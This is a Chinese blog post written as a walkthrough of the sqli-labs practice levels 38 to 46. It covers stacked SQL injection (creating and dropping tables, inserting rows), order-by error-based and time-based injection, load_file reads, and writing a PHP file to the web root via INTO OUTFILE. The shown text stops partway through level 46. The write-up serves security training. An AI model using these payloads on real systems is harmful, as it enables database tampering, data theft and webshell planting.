

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#ccccff">
  <meta name="author" content="echozt">
  <meta name="keywords" content="网络安全，计算机，渗透">
  
    <meta name="description" content="第三部分主要是堆叠注入。">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli靶场(38~53关)">
<meta property="og:url" content="https://echozt.github.io/posts/7e37.html">
<meta property="og:site_name" content="echozt">
<meta property="og:description" content="第三部分主要是堆叠注入。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/38.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/38_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/38_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/39.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/40.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/41.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/42.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/42_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/42_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/43.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/44.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/45.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/46.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/46_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/46_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/46_4.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/46_5.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/47.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/47_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/47_3.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/50.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/50_2.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/51.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/52.png">
<meta property="og:image" content="https://echozt.github.io/posts/7e37/53.png">
<meta property="article:published_time" content="2022-04-11T15:18:29.000Z">
<meta property="article:modified_time" content="2022-04-11T15:52:54.605Z">
<meta property="article:author" content="echozt">
<meta property="article:tag" content="靶场">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://echozt.github.io/posts/7e37/38.png">
  
  
  <title>sqli靶场(38~53关) - echozt</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/toubudaziji.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/bynotes/texiao/source/css/daziyanse.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"echozt.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.1"><link rel="alternate" href="/atom.xml" title="echozt" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>echozt&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default2.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="sqli靶场(38~53关)">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      echozt
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-11 23:18" pubdate>
        2022年4月11日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.7k 字
    </span>
  

  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">sqli靶场(38~53关)</h1>
            
            <div class="markdown-body">
              <p>第三部分主要是堆叠注入。</p>
<span id="more"></span>

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>浅浅地将mysql的堆叠语句列一下。</p>
<h3 id="Stacked-injections-堆叠注入"><a href="#Stacked-injections-堆叠注入" class="headerlink" title="Stacked injections:堆叠注入"></a>Stacked injections:堆叠注入</h3><p>堆叠注入：可以执行多条sql语句，语句之间以分号隔开。</p>
<p>堆叠注入实现数据库的增删查改操作：</p>
<h3 id="MySQL："><a href="#MySQL：" class="headerlink" title="MySQL："></a>MySQL：</h3><h4 id="（1）新建一个表"><a href="#（1）新建一个表" class="headerlink" title="（1）新建一个表"></a>（1）新建一个表</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span>create table <span class="token function">test</span> like <span class="token function">users</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（2）删除表"><a href="#（2）删除表" class="headerlink" title="（2）删除表"></a>（2）删除表</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span>drop table <span class="token function">test</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（3）查询数据"><a href="#（3）查询数据" class="headerlink" title="（3）查询数据"></a>（3）查询数据</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span><span class="token keyword">select</span> 1,2,3<span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（4）加载文件"><a href="#（4）加载文件" class="headerlink" title="（4）加载文件"></a>（4）加载文件</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span><span class="token keyword">select</span> load_file<span class="token punctuation">(</span><span class="token string">'C:/1.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h4 id="（5）修改数据"><a href="#（5）修改数据" class="headerlink" title="（5）修改数据"></a>（5）修改数据</h4><pre class="line-numbers language-bash"><code class="language-bash">Select * from <span class="token function">users</span> where id<span class="token operator">=</span>1<span class="token punctuation">;</span>insert into users<span class="token punctuation">(</span>id,username,password<span class="token punctuation">)</span> values<span class="token punctuation">(</span><span class="token string">'100'</span>,<span class="token string">'new'</span>,<span class="token string">'new'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="普通堆叠注入-Less-38-Less-45"><a href="#普通堆叠注入-Less-38-Less-45" class="headerlink" title="普通堆叠注入(Less-38~Less-45)"></a>普通堆叠注入(Less-38~Less-45)</h1><h2 id="Less-38"><a href="#Less-38" class="headerlink" title="Less-38"></a>Less-38</h2><p>前面的步骤还是来一遍。</p>
<h3 id="采用union联合查询："><a href="#采用union联合查询：" class="headerlink" title="采用union联合查询："></a>采用union联合查询：</h3><h4 id="①判断字段数"><a href="#①判断字段数" class="headerlink" title="①判断字段数"></a>①判断字段数</h4><p>当查到4时，报错，说明字段数为3位。</p>
<pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1' order by 4--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="②判断注入点"><a href="#②判断注入点" class="headerlink" title="②判断注入点"></a>②判断注入点</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1' union <span class="token keyword">select</span> 1,2,3--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>得到注入点为2和3。</p>
<h4 id="③获得数据库名"><a href="#③获得数据库名" class="headerlink" title="③获得数据库名"></a>③获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1' union <span class="token keyword">select</span> 1,2,database<span class="token punctuation">(</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>得到数据库名为security。</p>
<h4 id="④获得表名"><a href="#④获得表名" class="headerlink" title="④获得表名"></a>④获得表名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1' union <span class="token keyword">select</span> 1,2,<span class="token punctuation">(</span>select group_concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span> from information_schema.tables where table_schema<span class="token operator">=</span>database<span class="token punctuation">(</span><span class="token punctuation">))</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>得到用户表名为users。</p>
<h4 id="⑤获得列名"><a href="#⑤获得列名" class="headerlink" title="⑤获得列名"></a>⑤获得列名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>-1<span class="token string">' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='</span>users'<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>得到几个有用的列名：id,username,password</p>
<p>进入正文啦。</p>
<h3 id="38-1增加一个表格test"><a href="#38-1增加一个表格test" class="headerlink" title="38.1增加一个表格test"></a>38.1增加一个表格test</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1'<span class="token punctuation">;</span>create table <span class="token function">test</span> like users--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p> <img src="/posts/7e37/38.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="38-2删除表格test"><a href="#38-2删除表格test" class="headerlink" title="38.2删除表格test"></a>38.2删除表格test</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1'<span class="token punctuation">;</span>drop table test--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p> <img src="/posts/7e37/38_2.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="38-3在表中实现增加语句"><a href="#38-3在表中实现增加语句" class="headerlink" title="38.3在表中实现增加语句"></a>38.3在表中实现增加语句</h3><pre class="line-numbers language-bash"><code class="language-bash">payload:

id<span class="token operator">=</span>1<span class="token string">';insert into users(id,username,password) values('</span>38<span class="token string">','</span>Less38<span class="token string">','</span>Less38'<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以在数据库中，看到此时users表中已经成功插入一列：</p>
<p> <img src="/posts/7e37/38_3.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-39"><a href="#Less-39" class="headerlink" title="Less-39"></a>Less-39</h2><p>本关和第三十八一样，只需要将第三十八的单引号去掉即可。</p>
<h4 id="在users表中插入一列数据："><a href="#在users表中插入一列数据：" class="headerlink" title="在users表中插入一列数据："></a>在users表中插入一列数据：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token punctuation">;</span>insert into users<span class="token punctuation">(</span>id,username,password<span class="token punctuation">)</span> values<span class="token punctuation">(</span><span class="token string">'39'</span>,<span class="token string">'Less39'</span>,<span class="token string">'Less39'</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以在数据库中，看到此时users表中已经成功插入一列：</p>
<p> <img src="/posts/7e37/39.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-40"><a href="#Less-40" class="headerlink" title="Less-40"></a>Less-40</h2><p>本关和第三十八一样，只需要将第三十八关的’改为’)即可</p>
<h4 id="在users表中插入一列数据：-1"><a href="#在users表中插入一列数据：-1" class="headerlink" title="在users表中插入一列数据："></a>在users表中插入一列数据：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token string">'); insert into users(id,username,password) values('</span>40<span class="token string">','</span>Less-40<span class="token string">','</span>Less-40'<span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以在数据库中，看到此时users表中已经成功插入一列：</p>
<p> <img src="/posts/7e37/40.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-41"><a href="#Less-41" class="headerlink" title="Less-41"></a>Less-41</h2><p>此处与 less-39 是一致的，区别在于 41 错误不回显。所以我们称之为盲注。</p>
<h4 id="在users表中插入一列数据：-2"><a href="#在users表中插入一列数据：-2" class="headerlink" title="在users表中插入一列数据："></a>在users表中插入一列数据：</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

id<span class="token operator">=</span>1<span class="token punctuation">;</span>insert into users<span class="token punctuation">(</span>id,username,password<span class="token punctuation">)</span> values<span class="token punctuation">(</span><span class="token string">'41'</span>,<span class="token string">'Less41'</span>,<span class="token string">'Less41'</span><span class="token punctuation">)</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以在数据库中，看到此时users表中已经成功插入一列：</p>
<p> <img src="/posts/7e37/41.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-42"><a href="#Less-42" class="headerlink" title="Less-42"></a>Less-42</h2><p>分析源代码后，得知password 变量在 post 过程中，没有通过 mysql_real_escape_string()函数的处理。因此在登录</p>
<p>的时候密码选项我们可以进行攻击。</p>
<h3 id="42-1创建一个名为Less42的表格"><a href="#42-1创建一个名为Less42的表格" class="headerlink" title="42.1创建一个名为Less42的表格"></a>42.1创建一个名为Less42的表格</h3><pre class="line-numbers language-bash"><code class="language-bash">登录框可以随意输入，甚至可以不输

密码框：1'<span class="token punctuation">;</span>create table Less42 like <span class="token function">users</span><span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这里要注意一下，表名不能是纯数字，不然创建不了的哦。</p>
<p>可以看到已经成功将Less42的表添加：</p>
<p> <img src="/posts/7e37/42.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="42-2删除名为Less42的表"><a href="#42-2删除名为Less42的表" class="headerlink" title="42.2删除名为Less42的表"></a>42.2删除名为Less42的表</h3><pre class="line-numbers language-bash"><code class="language-bash">登录框可以随意输入，甚至可以不输

密码框：1'<span class="token punctuation">;</span>drop table Less42<span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功将Less42的表删除：</p>
<p> <img src="/posts/7e37/42_2.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="42-3在users表中插入一行数据"><a href="#42-3在users表中插入一行数据" class="headerlink" title="42.3在users表中插入一行数据"></a>42.3在users表中插入一行数据</h3><pre class="line-numbers language-bash"><code class="language-bash">登录框可以随意输入，甚至可以不输

密码框：1<span class="token string">';insert into users(id,username,password) values('</span>42<span class="token string">','</span>Less42<span class="token string">','</span>Less42'<span class="token punctuation">)</span><span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功在users表中添加了一列：</p>
<p> <img src="/posts/7e37/42_3.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-43"><a href="#Less-43" class="headerlink" title="Less-43"></a>Less-43</h2><p>本关和第四十二关原理一致，只需要将第四十二关的’换成’)即可。</p>
<h4 id="创建一个名为Less43的表格"><a href="#创建一个名为Less43的表格" class="headerlink" title="创建一个名为Less43的表格"></a>创建一个名为Less43的表格</h4><pre class="line-numbers language-bash"><code class="language-bash">登录框可以随意输入，甚至可以不输

密码框：1'<span class="token punctuation">)</span><span class="token punctuation">;</span>create table Less43 like <span class="token function">users</span><span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h5 id="这里要注意一下，表名不能是纯数字，不然创建不了的哦。"><a href="#这里要注意一下，表名不能是纯数字，不然创建不了的哦。" class="headerlink" title="这里要注意一下，表名不能是纯数字，不然创建不了的哦。"></a>这里要注意一下，表名不能是纯数字，不然创建不了的哦。</h5><p>可以看到已经成功将Less43的表添加：</p>
<p> <img src="/posts/7e37/43.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-44"><a href="#Less-44" class="headerlink" title="Less-44"></a>Less-44</h2><p>这关与 42 关的区别就在于没有报错信息，但是跟我们用堆叠注入没有什么关系，所以我们可以使用同样方式的 payload。</p>
<h4 id="在users表中插入一行数据"><a href="#在users表中插入一行数据" class="headerlink" title="在users表中插入一行数据"></a>在users表中插入一行数据</h4><pre class="line-numbers language-bash"><code class="language-bash">登录框可以随意输入，甚至可以不输

密码框：1<span class="token string">';insert into users(id,username,password) values('</span>44<span class="token string">','</span>Less44<span class="token string">','</span>Less44'<span class="token punctuation">)</span><span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>可以看到已经成功在users表中添加了一列：</p>
<p> <img src="/posts/7e37/44.png" srcset="/img/loading.gif" lazyload class></p>
<h2 id="Less-45"><a href="#Less-45" class="headerlink" title="Less-45"></a>Less-45</h2><p>同样的，45 关与 43 关的 payload 是一样的，只不过 45 关依旧没有报错。</p>
<h4 id="创建一个名为Less45的表格"><a href="#创建一个名为Less45的表格" class="headerlink" title="创建一个名为Less45的表格"></a>创建一个名为Less45的表格</h4><pre class="line-numbers language-bash"><code class="language-bash">登录框可以随意输入，甚至可以不输

密码框：1'<span class="token punctuation">)</span><span class="token punctuation">;</span>create table Less45 like <span class="token function">users</span><span class="token comment" spellcheck="true">#</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这里要注意一下，表名不能是纯数字，不然创建不了的哦。</p>
<p>可以看到已经成功将Less45的表添加：</p>
<p> <img src="/posts/7e37/45.png" srcset="/img/loading.gif" lazyload class></p>
<h1 id="order-by后的注入-Less-46-Less-49"><a href="#order-by后的注入-Less-46-Less-49" class="headerlink" title="order by后的注入(Less-46~Less-49)"></a>order by后的注入(Less-46~Less-49)</h1><p>一般来说，尝试?sort=1 desc和?sort=1 asc</p>
<p>如果显示结果不同，则表明可以注入。</p>
<p>（其中，desc表示降序排列 ，asc表示升序排列，默认是asc。）</p>
<h3 id="（1）order-by后的数字可以作为一个注入点"><a href="#（1）order-by后的数字可以作为一个注入点" class="headerlink" title="（1）order by后的数字可以作为一个注入点"></a>（1）order by后的数字可以作为一个注入点</h3><p>①直接添加语句，?sort=(select……)</p>
<p>②利用一些函数。例如rand()函数等。?sort=rand(sql语句)</p>
<p>③利用and，例如?sort=1 and (加sql语句)</p>
<h3 id="（2）procedure-analyse参数后注入"><a href="#（2）procedure-analyse参数后注入" class="headerlink" title="（2）procedure analyse参数后注入"></a>（2）procedure analyse参数后注入</h3><pre class="line-numbers language-bash"><code class="language-bash">例如：sort<span class="token operator">=</span>1 procedure analyse<span class="token punctuation">(</span>sql语句<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h3 id="（3）导入导出文件into-outfile参数"><a href="#（3）导入导出文件into-outfile参数" class="headerlink" title="（3）导入导出文件into outfile参数"></a>（3）导入导出文件into outfile参数</h3><p>将查询结果导入到文件当中：</p>
<pre class="line-numbers language-bash"><code class="language-bash">例如：?sort<span class="token operator">=</span>1 into outfile <span class="token string">"C:\\phpstudy\\www\\sqli\\a.txt"</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>利用lines terminated by，上传木马:</p>
<pre class="line-numbers language-bash"><code class="language-bash">?sort<span class="token operator">=</span>1 into outfile C:\\phpstudy\\www\\a.txt lines terminated by 0x<span class="token punctuation">(</span>木马进行十六进制转换<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="Less-46"><a href="#Less-46" class="headerlink" title="Less-46"></a>Less-46</h2><p>关于order by后的一些参数进行注入：</p>
<p>本关的 sql 语句为：</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token variable">$sql</span> <span class="token operator">=</span> <span class="token string">"SELECT * FROM users ORDER BY <span class="token variable">$id</span>"</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>尝试?sort=1 desc和?sort=1 asc</p>
<p>如果显示结果不同，则表明可以注入。</p>
<p>并且，我们的注入点在 order by 后面的参数中，order by后为数字。</p>
<h3 id="（1）利用报错注入"><a href="#（1）利用报错注入" class="headerlink" title="（1）利用报错注入"></a>（1）利用报错注入</h3><h4 id="①获得数据库用户名"><a href="#①获得数据库用户名" class="headerlink" title="①获得数据库用户名"></a>①获得数据库用户名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

?sort<span class="token operator">=</span><span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>

或者

?sort<span class="token operator">=</span>rand<span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>

或者

?sort<span class="token operator">=</span>1 and <span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,user<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p> <img src="/posts/7e37/46.png" srcset="/img/loading.gif" lazyload class></p>
<h4 id="②获得数据库名"><a href="#②获得数据库名" class="headerlink" title="②获得数据库名"></a>②获得数据库名</h4><pre class="line-numbers language-bash"><code class="language-bash">payload：

?sort<span class="token operator">=</span><span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,database<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>

或者

?sort<span class="token operator">=</span>rand<span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,database<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>

或者

?sort<span class="token operator">=</span>1 and <span class="token punctuation">(</span>updatexml<span class="token punctuation">(</span>1,concat<span class="token punctuation">(</span>0x7e,database<span class="token punctuation">(</span><span class="token punctuation">)</span>,0x7e<span class="token punctuation">)</span>,1<span class="token punctuation">))</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p> <img src="/posts/7e37/46_2.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="（2）利用延时注入"><a href="#（2）利用延时注入" class="headerlink" title="（2）利用延时注入"></a>（2）利用延时注入</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1 and <span class="token punctuation">(</span>if<span class="token punctuation">(</span>substr<span class="token punctuation">(</span>user<span class="token punctuation">(</span><span class="token punctuation">)</span>,1,1<span class="token punctuation">)</span><span class="token operator">=</span><span class="token string">'a'</span>,sleep<span class="token punctuation">(</span>5<span class="token punctuation">)</span>,0<span class="token punctuation">))</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>这里可以用burp对字符a爆破，得到数据库名第一个字符为s。</p>
<p> <img src="/posts/7e37/46_3.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="（3）导入导出文件-into-outfile-参数"><a href="#（3）导入导出文件-into-outfile-参数" class="headerlink" title="（3）导入导出文件 into outfile 参数"></a>（3）导入导出文件 into outfile 参数</h3><pre class="line-numbers language-bash"><code class="language-bash">payload：

sort<span class="token operator">=</span>1 into outfile <span class="token string">"D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-46\\test.txt"</span>--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>此时查询结果已经导入到test.txt文件当中了:</p>
<p> <img src="/posts/7e37/46_4.png" srcset="/img/loading.gif" lazyload class></p>
<h3 id="（4）利用-lines-terminated-by上传木马"><a href="#（4）利用-lines-terminated-by上传木马" class="headerlink" title="（4）利用 lines terminated by上传木马"></a>（4）利用 lines terminated by上传木马</h3><pre class="line-numbers language-bash"><code class="language-bash">将<span class="token operator">&lt;</span>?php phpinfo<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>?<span class="token operator">></span>转换为十六进制：3c3f70687020706870696e666f28293b3f3e

payload:

sort<span class="token operator">=</span>1 into outfile <span class="token string">"D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-47\\test.php"</span>lines terminated by 0x3c3f70687020706870696e666f28293b3f3e--+
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>此时，可以成功访问text.php：</p>
